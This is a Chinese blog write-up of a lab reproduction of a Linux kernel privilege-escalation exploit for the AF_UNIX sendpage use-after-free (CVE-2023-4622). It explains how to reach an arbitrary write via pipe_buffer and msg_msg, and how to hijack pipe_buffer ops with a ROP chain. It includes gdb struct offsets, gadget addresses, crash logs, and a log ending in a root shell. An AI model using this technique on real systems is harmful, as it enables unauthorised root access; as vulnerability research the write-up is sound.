poc中的利用方法 - AF_UNIX sendpage UAF
skb释放后被pipe_buf 分配到,通过pipe_buf控制skb的内容,在skb_append_pagefrags中触发UAF的实际写入。 函数中通过skb_shinfo写入一个frag
/* The skb_shared_info block is located at the end of the skb's data buffer,
 * i.e. at whatever address skb_end_pointer() resolves to for that skb. */
#define skb_shinfo(SKB) ((struct skb_shared_info *)(skb_end_pointer(SKB)))
/*
 * Return the end of the skb's data buffer. skb->end is kept as an offset
 * from skb->head, so the two fields together determine the address that
 * skb_shinfo() (and every frag write made through it) lands on.
 */
static inline unsigned char *skb_end_pointer(const struct sk_buff *skb)
{
return skb->head + skb->end;
}
通过控制head,end的值,就可以改写任意内核地址的内容。skb->head, skb->end的偏移位置:
(gdb) p/x &(((struct sk_buff*)0)->head)
$1 = 0xc8
(gdb) p/x &(((struct sk_buff*)0)->end)
$4 = 0xc0
(gdb) p/x &(((struct skb_shared_info*)0)->nr_frags)
$5 = 0x2
(gdb) p/x &(((struct skb_shared_info*)0)->frags[0].bv_offset)
$7 = 0x3c
AF_UNIX sendpage uaf 写pipe结构,pipe结构写msg_msg结构,使两个next指向同一个msg_msg结构 -> UAF
msg_msg UAF exploit:
进一步利用时会在list_del处crash, as CONFIG_BUG_ON_DATA_CORRUPTION=y — set it to n and test again? Or are there other routes from the msg_msg UAF?
0x300
found corrupted: type 194, queue 28406, victim queue 28086, victim type 195
corrupted_q: 28406
corrupted_type: 194
victim_q: 28086
victim_type: 195
victim2_q: 28092
victim2_type: 195
known_addr_rop 0xffff8881046f4000
known_addr_pipe 0xffff88800c7ce800
victim3_q: 15
victim4_q: 18
victim5_q: 12
anon_pipe_buf 0xffffffff82c2e880
fixing kernel base to 0xffffffff81000000
msgrcv hackq victim5_q
msgsnd hackq[] with fake msg
msgrcv hackq[] without victim5_q
[ 754.005329] list_del corruption, ffff888008720000->next is NULL
[ 754.052628] ------------[ cut here ]------------
[ 754.071499] kernel BUG at lib/list_debug.c:49!
[ 754.086019] invalid opcode: 0000 [#1] PREEMPT SMP PTI
[ 754.095683] CPU: 1 PID: 431 Comm: poc Not tainted 6.3.0 #93
[ 754.104400] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 754.123544] RIP: 0010:__list_del_entry_valid+0x59/0xc0
[ 754.128561] Code: 48 8b 01 48 39 f8 75 5a 48 8b 72 08 48 39 f0 75 65 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 48 e5 2b 83 e8 87 bb 8b ff <0f> 0b 48 89 fe 48 c7 c7 78 e5 2b 83 e8 76 bb 8b ff 0f 0b 48 89 fe
[ 754.159796] RSP: 0018:ffffc90000b33d98 EFLAGS: 00010246
[ 754.168778] RAX: 0000000000000033 RBX: 0000000000001337 RCX: 0000000000000000
[ 754.180775] RDX: 0000000000000000 RSI: ffffffff831f90a0 RDI: 00000000ffffffff
[ 754.191226] RBP: ffffc90000b33e70 R08: 00000000ffffdfff R09: 0000000000000001
[ 754.201554] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88810b6ee400
[ 754.210648] R13: 0000000000000000 R14: ffff888008720000 R15: 0000000000001337
[ 754.219359] FS: 000000000061f3c0(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[ 754.228847] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 754.237818] CR2: 00000000004da400 CR3: 000000000adf8000 CR4: 0000000000050ee0
[ 754.250262] Call Trace:
[ 754.257880] <TASK>
[ 754.262829] do_msgrcv+0x4e5/0x760
[ 754.270994] ? __pfx_do_msg_fill+0x10/0x10
[ 754.277180] do_syscall_64+0x64/0x90
[ 754.284150] ? exit_to_user_mode_prepare+0x1a/0x140
[ 754.293784] ? syscall_exit_to_user_mode+0x22/0x50
[ 754.302853] ? do_syscall_64+0x70/0x90
[ 754.307906] ? syscall_exit_to_user_mode+0x22/0x50
[ 754.311440] ? do_syscall_64+0x70/0x90
[ 754.317576] ? do_syscall_64+0x70/0x90
[ 754.321945] ? syscall_exit_to_user_mode+0x22/0x50
[ 754.326590] ? do_syscall_64+0x70/0x90
[ 754.329767] ? do_syscall_64+0x70/0x90
[ 754.336447] entry_SYSCALL_64_after_hwframe+0x72/0xdc
[ 754.341288] RIP: 0033:0x42e62d
[ 754.346468] Code: f0 89 7d f8 48 89 4d e0 e8 90 91 02 00 44 8b 45 dc 4c 8b 55 e0 41 89 c1 48 8b 55 e8 48 8b 75 f0 b8 46 00 00 00 8b 7d f8 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 cf 48 89 45 f8 e8 df 91 02 00 48 8b
[ 754.394047] RSP: 002b:00007ffced7fc290 EFLAGS: 00000293 ORIG_RAX: 0000000000000046
[ 754.408102] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 000000000042e62d
[ 754.423673] RDX: 0000000000000050 RSI: 00000000004dd440 RDI: 0000000000006ef6
[ 754.435026] RBP: 00007ffced7fc2c0 R08: 0000000000000800 R09: 0000000000000000
[ 754.451520] R10: 0000000000001337 R11: 0000000000000293 R12: 00007ffced7fc5e8
[ 754.479406] R13: 00007ffced7fc5f8 R14: 00000000004c9808 R15: 0000000000000001
[ 754.494691] </TASK>
[ 754.501195] Modules linked in:
[ 754.506376] ---[ end trace 0000000000000000 ]---
[ 754.532457] RIP: 0010:__list_del_entry_valid+0x59/0xc0
[ 754.543759] Code: 48 8b 01 48 39 f8 75 5a 48 8b 72 08 48 39 f0 75 65 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 48 e5 2b 83 e8 87 bb 8b ff <0f> 0b 48 89 fe 48 c7 c7 78 e5 2b 83 e8 76 bb 8b ff 0f 0b 48 89 fe
[ 754.571529] RSP: 0018:ffffc90000b33d98 EFLAGS: 00010246
[ 754.579340] RAX: 0000000000000033 RBX: 0000000000001337 RCX: 0000000000000000
[ 754.592546] RDX: 0000000000000000 RSI: ffffffff831f90a0 RDI: 00000000ffffffff
[ 754.606379] RBP: ffffc90000b33e70 R08: 00000000ffffdfff R09: 0000000000000001
[ 754.618873] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88810b6ee400
[ 754.632027] R13: 0000000000000000 R14: ffff888008720000 R15: 0000000000001337
[ 754.645887] FS: 000000000061f3c0(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[ 754.664880] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 754.678003] CR2: 00000000004da400 CR3: 000000000adf8000 CR4: 0000000000050ee0
[ 754.691818] Kernel panic - not syncing: Fatal exception
pipe_buffer UAF:
pipe_buffer是一个数组, kcalloc分配时,16 * 40(pipe_buffer大小) = 640 > 512,因此在kmalloc-1024中分配:
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);
覆盖ops及ops->release, pipe关闭时释放pipe_buffer数组第一个元素时即触发:
free_pipe_info
for (i = 0; i < pipe->ring_size; i++) {
struct pipe_buffer *buf = pipe->bufs + i;
if (buf->ops)
pipe_buf_release(pipe, buf);
}
/*
 * Release the buffer through its ops->release callback.
 *
 * ops is read and cleared before the indirect call, so a later pass over
 * the same slot (free_pipe_info only releases buffers whose ops is set)
 * does not release it a second time. Note that the callback address is
 * loaded from the heap-resident pipe_buffer itself: the integrity of
 * buf->ops is exactly what this call depends on.
 */
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops;
buf->ops = NULL;
ops->release(pipe, buf);
}
>p/x &((struct pipe_buffer*)0)->ops
$1 = 0x10
anon_pipe_buf_ops -> anon_pipe_buf_release
static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf) // 第二个参数是buf本身,rsi
success logs:
$ ./poc
POP_RDI @ 0xffffffff8139a28d
POP_RDX @ 0xffffffff815fb154
POP_RSI @ 0xffffffff8101a6b7
POP_RSP @ 0xffffffff8101a90e
PIVOT2 @ 0xffffffff8115783e
PIVOT3 @ 0xffffffff81c80044
setup msg start..
setup msg done
setup head to 0xffff8880082e2380
0x100
0x200
found corrupted: type 196, queue 30362, victim queue 30191, victim type 197
corrupted_q: 30362
corrupted_type: 196
victim_q: 30191
victim_type: 197
victim2_q: 30215
victim2_type: 197
known_addr_rop 0xffff88800a4ab000
known_addr_pipe 0xffff88800a4c3400
victim3_q: 9
victim4_q: 12
victim5_q: 6
anon_pipe_buf 0xffffffff82c2e6c0
fixing kernel base to 0xffffffff81000000
msgrcv hackq victim5_q
msgsnd hackq[] with fake msg
msgrcv hackq[] without victim5_q
[ 527.201411] ------------[ cut here ]------------
[ 527.213001] list_del corruption, ffff888008700000->next is NULL
[ 527.225026] WARNING: CPU: 1 PID: 441 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[ 527.286586] Modules linked in:
[ 527.292214] CPU: 1 PID: 441 Comm: poc Not tainted 6.3.0-dirty #96
[ 527.313003] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 527.337204] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[ 527.346700] Code: 48 8b 01 48 39 f8 75 67 48 8b 72 08 48 39 c6 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 28 e3 2b 83 e8 07 6f 84 ff <0f> 0b 31 c0 c3 cc cc cc cc 48 89 fe 48 c7 c7 50 e3 2b 83 e8 ef 6e
[ 527.381825] RSP: 0018:ffffc90000943d98 EFLAGS: 00010282
[ 527.395278] RAX: 0000000000000000 RBX: 0000000000001337 RCX: 0000000000000000
[ 527.411171] RDX: 0000000000000003 RSI: ffffffff831f8ea8 RDI: 00000000ffffffff
[ 527.428334] RBP: ffffc90000943e70 R08: 00000000ffffdfff R09: 0000000000000001
[ 527.442482] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88810b4b5600
[ 527.463808] R13: 0000000000000000 R14: ffff888008700000 R15: 0000000000001337
[ 527.492356] FS: 0000000001b123c0(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[ 527.509619] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 527.523676] CR2: 00000000004da400 CR3: 000000000a4e4000 CR4: 0000000000050ee0
[ 527.543662] Call Trace:
[ 527.552164] <TASK>
[ 527.558567] do_msgrcv+0x4e5/0x760
[ 527.581863] ? __pfx_do_msg_fill+0x10/0x10
[ 527.603898] ? do_syscall_64+0x70/0x90
[ 527.614687] do_syscall_64+0x64/0x90
[ 527.622616] ? exit_to_user_mode_prepare+0x1a/0x140
[ 527.634348] ? syscall_exit_to_user_mode+0x22/0x50
[ 527.644161] ? do_syscall_64+0x70/0x90
[ 527.654531] ? syscall_exit_to_user_mode+0x22/0x50
[ 527.665412] ? do_syscall_64+0x70/0x90
[ 527.674605] ? exit_to_user_mode_prepare+0x1a/0x140
[ 527.683838] ? syscall_exit_to_user_mode+0x22/0x50
[ 527.693838] ? do_syscall_64+0x70/0x90
[ 527.703395] entry_SYSCALL_64_after_hwframe+0x72/0xdc
[ 527.712917] RIP: 0033:0x42e5ed
[ 527.720030] Code: f0 89 7d f8 48 89 4d e0 e8 90 91 02 00 44 8b 45 dc 4c 8b 55 e0 41 89 c1 48 8b 55 e8 48 8b 75 f0 b8 46 00 00 00 8b 7d f8 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 cf 48 89 45 f8 e8 df 91 02 00 48 8b
[ 527.755587] RSP: 002b:00007fffb6cb1270 EFLAGS: 00000293 ORIG_RAX: 0000000000000046
[ 527.769792] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 000000000042e5ed
[ 527.782243] RDX: 0000000000000050 RSI: 00000000004dd440 RDI: 000000000000769a
[ 527.795741] RBP: 00007fffb6cb12a0 R08: 0000000000000800 R09: 0000000000000000
[ 527.809447] R10: 0000000000001337 R11: 0000000000000293 R12: 00007fffb6cb15c8
[ 527.821765] R13: 00007fffb6cb15d8 R14: 00000000004c9808 R15: 0000000000000001
[ 527.837768] </TASK>
[ 527.843269] ---[ end trace 0000000000000000 ]---
msgrcv msgid corrupted
try to fake pipe buffer with rop chain
wait for end
[ 589.627491] poc[414]: segfault at 0 ip 00000000004039cf sp 00007fffb6cb1360 error 6 in poc[401000+9e000] likely on CPU 1 (core 1, socket 0)
[ 589.659517] Code: 00 8b 45 f4 89 c7 e8 10 8a 02 00 eb 0a bf 01 00 00 00 e8 84 7d 02 00 b8 00 00 00 00 e8 7c fd ff ff 85 c0 74 e8 b8 00 00 00 00 <48> c7 00 00 00 00 00 90 c9 c3 f3 0f 1e fa 55 48 89 e5 48 81 ec 20
FLAG{test-by-hxqu}
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@wintermute:/# whoami
root
环境设置
- br设置 br.sh
- qemu cmd
qemu-system-x86_64 -m 4096m -kernel ./bzImage -hda ./rootfs.img -nographic -append root=/dev/sda init=/lib/systemd/systemd rw console=ttyS0 earlyprintk=vga nokaslr selinux=0 audit=0 systemd.show_status=0 kernel.printk=1 -s -S -cpu host -smp 4 -enable-kvm -net nic,model=virtio -net bridge,br=br0
- rootfs image 请参考mk-rootfs
全部复现文件 传送门
文档信息
- 本文作者:seamaner
- 本文链接:https://seamaner.github.io/2025/05/16/CVE-2023-4622/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)